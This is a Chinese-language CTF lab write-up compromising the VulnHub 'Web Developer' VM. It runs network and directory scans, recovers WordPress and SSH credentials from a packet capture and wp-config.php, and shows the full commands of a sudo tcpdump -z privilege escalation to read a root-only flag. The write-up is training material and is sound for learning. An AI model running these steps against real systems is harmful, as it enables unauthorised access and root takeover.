目录
1.实验目的和要求
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。
系统环境:Kali Linux 2、WebDeveloper靶机来源:Vulnerable By Design ~ VulnHub
实验工具:不限
2.实验步骤
目的:获取靶机Web Developer 文件/root/flag.txt中flag。
基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。
实施细节如下:
1、发现目标 (netdiscover),找到WebDeveloper的IP地址。截图。
指令:netdiscover -i eth0 -r 192.168.57.0/24
2、:利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说明目标提供的服务有哪些?(利用第一次实验知识点)
指令:nmap 目标主机IP
用nmap扫描目标主机,发现22号端口(ssh远程登录)开放,80端口(HTTP服务)开放。
3、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。截图。是否有可用信息?
网页输入:目标主机IP
感觉无可用信息
4、利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么?
指令:whatweb 192.168.57.117
用whatweb探测目标网站使用的CMS模板是World Press[4.9.8]
5、网络搜索wpscan,简要说明其功能。
Wpscan是一款开源的命令行工具,专门用于扫描和识别WordPress网站中的漏洞和安全问题。具体功能包括:
(1)扫描和识别:它利用已知的漏洞数据库和指纹识别技术,检测出各种类型的漏洞,如弱密码、SQL注入、XSS(跨站脚本攻击)等。
(2) 插件和主题漏洞扫描:可以扫描目标网站上安装的插件和主题,以发现可能存在的安全漏洞。它会检查插件和主题的版本信息,并与已知的漏洞数据库进行比对,以确定是否存在已公开的漏洞。
(3)用户名枚举和弱密码扫描:帮助渗透测试人员识别目标WordPress网站上的有效用户名,并进行弱密码扫描。它可以使用常见的用户名列表和密码字典来暴力破解登录凭据,以测试网站的弱点。
(4)漏洞利用和渗透测试:WPScan不仅仅是一个扫描工具,还提供了一些漏洞利用和渗透测试的功能。它可以自动化执行一些已知漏洞的利用,以获取敏感信息或对目标网站进行进一步的攻击。
(5) 报告生成:支持使用不同的插件和脚本来执行不同类型的扫描,以及生成报告和输出结果。
总之,WPScan的功能十分强大,是一款强大的网络安全工具,有助于提高网络安全防范水平。更多详情建议查询官网或专业书籍获取。
6、使用 Dirb 爆破网站目录。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。找到一个似乎和网络流量有关的目录(路径)。
指令:dirb http://目标主机IP/
7、浏览器访问该目录(路径),发现一个cap文件。截图。
下载analyse.cap,然后用wires hark打开
8、利用Wireshark分析该数据包,分析TCP数据流。找到什么有用的信息?截图。
账号:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd
9、利用上一步得到的信息进入网站后台。截图。
(网站管理员账号与操作系统账号是不同概念)
使用上一步获得账号密码登录,进入后台
10、利用该CMS存在的(插件Plugin)漏洞。
11、利用该插件漏洞提权。
可选方案1:利用MeterSploit插件+reflex gallery插件漏洞实现。安装reflex gallery插件。利用该插件可能存在的漏洞。(课本知识点)
建立会话后,查看wp-config.php获得账号及口令。(配置文件很重要,各种系统的配置文件)。
获得的账号、口令是用来访问什么目标?注意与第7步描述比较。
方案3:利用文件管理插件(File manager)漏洞。
安装该插件,直接可以浏览wp-config.php。
在wordpress网站下载File manager插件,然后打开WP File manager,找到一个wp-config.php文件并下载,打开直接可以看到账号密码
得到了目标主机的账号密码
账号:webdeveloper
密码:MasterOfTheUniverse
12、SSH登录服务器
尝试利用上一步获得的访问数据库的用户名和密码连接远程服务器。截图。
访问成功!
1、尝试查看/root/flag.txt
2、使用tcpdump执行任意命令(当tcpdump捕获到数据包后会执行指定的命令。)
查看当前身份可执行的命令。
发现可以root权限执行tcpdump命令
创建攻击文件
创建攻击文件
touch /tmp/exploit1
写入shellcode
echo 'cat /root/flag.txt' > /tmp/exploit
赋予可执行权限
chmod +x /tmp/exploit
利用tcpdump执行任意命令
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
获得flag
tcpdump命令详解:
-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
-W [num] 指定抓包数量
3.实验小结
靶机Web Developer和kali在同一个网段,我们首先使用netdiscover工具扫描该网段,寻找存活的目标靶机的IP地址。netdiscover是一个强大的网络发现工具,可以帮助我们快速找到网络中的存活主机。
一旦我们获得了目标靶机的IP地址,接下来使用nmap进行端口扫描。nmap是一个非常流行的网络扫描工具,它可以扫描指定主机的开放端口,帮助我们了解目标主机上运行的服务。通过扫描,我们发现目标靶机开放了80端口和22端口,分别是http服务和ssh服务。
根据开放端口的信息,我们猜测目标主机提供了一个http服务。为了验证这个猜测,我们尝试使用浏览器访问目标网站的域名。通过访问目标网站,我们可以进一步了解该网站使用的CMS(内容管理系统)模板。
为了探测目标网站使用的CMS模板,我们使用了whatweb工具。whatweb是一个强大的网站侦查工具,它可以检测网站使用的CMS类型、插件等信息。通过whatweb的检测,我们发现该网站搭建使用的CMS模板是World press[4.9.8]。
知道了目标网站使用的CMS模板后,我们可以利用wpscan工具扫描该网站存在的漏洞。wpscan是一个针对WordPress的漏洞扫描工具,它可以检测WordPress网站的各种漏洞,并提供修复建议。
在扫描过程中,我们发现了一些潜在的漏洞。为了进一步利用这些漏洞,我们需要获取目标网站的目录结构。于是,我们利用kali自带的Dirb工具进行目录爆破。Dirb是一个目录枚举工具,它可以尝试猜测目标网站的目录结构,并帮助我们找到敏感文件或目录。
在爆破过程中,我们发现了一个似乎跟网络流量有关的路径。为了验证这个路径是否包含有价值的信息,我们使用浏览器访问该路径。访问成功后,我们发现了一个cap文件,正好可以用wires hark打开进行流量分析。Wireshark是一款强大的网络协议分析器,它可以捕获网络流量并详细分析每个数据包的内容。
在流量分析过程中,我们过滤了http中的要登录的post请求数据。通过分析这些数据包,我们发现了一些类似账号密码的信息。这些信息很可能是网站后台的登录账号密码。
有了这些账号密码信息,我们尝试访问后台登录的url。成功登录进入后台后,我们进一步利用该CMS存在的(插件Plugin)漏洞进行提权操作。通过提权操作,我们可以访问到一些敏感文件,如config文件等。在这些文件中,我们发现了服务器的账号密码。
有了服务器的账号密码,我们尝试使用ssh远程登录服务器访问数据库。在数据库中,我们尝试查找/root/flag.txt文件,但均无法查看。为了获取该文件的内容,我们使用了tcpdump进行抓包分析。通过抓包分析,我们成功提权并查看了flag文件的内容。
1111
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
